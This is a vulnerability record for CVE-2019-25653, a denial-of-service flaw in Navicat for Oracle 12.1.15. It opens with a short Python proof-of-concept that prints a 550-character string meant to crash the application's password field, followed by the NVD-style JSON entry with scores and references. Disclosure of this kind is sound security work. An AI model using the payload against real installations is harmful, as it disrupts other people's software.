CVE-2019-25653

# PoC Code for CVE-2019-25653 # Description: This script generates a payload to trigger the DoS in Navicat for Oracle 12.1.15. # Usage: Run the script, copy the output, and paste it into the password field of a new Oracle connection. def generate_payload(): # The vulnerability is triggered by a string of 550 characters length = 550 payload = "A" * length return payload if __name__ == "__main__": crash_payload = generate_payload() print(f"Payload generated (Length: {len(crash_payload)}):") print(crash_payload)

{"cve": {"id": "CVE-2019-25653", "sourceIdentifier": "[email protected]", "published": "2026-03-30T12:16:17.953", "lastModified": "2026-04-08T16:31:18.803", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Navicat for Oracle 12.1.15 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the password field. Attackers can paste a buffer of 550 repeated characters into the password parameter during Oracle connection configuration to trigger an application crash."}, {"lang": "es", "value": "Navicat for Oracle 12.1.15 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al introducir una cadena excesivamente larga en el campo de contraseña. Los atacantes pueden pegar un búfer de 550 caracteres repetidos en el parámetro de contraseña durante la configuración de la conexión de Oracle para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-620"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:navicat:navicat_for_oracle:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.1.15", "matchCriteriaId": "5C6719BC-67BC-4180-B66E-F95A3681B116"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46383", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.navicat.com/es/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.navicat.com/es/download/navicat-for-oracle", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/navicat-for-oracle-password-field-denial-of-service", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}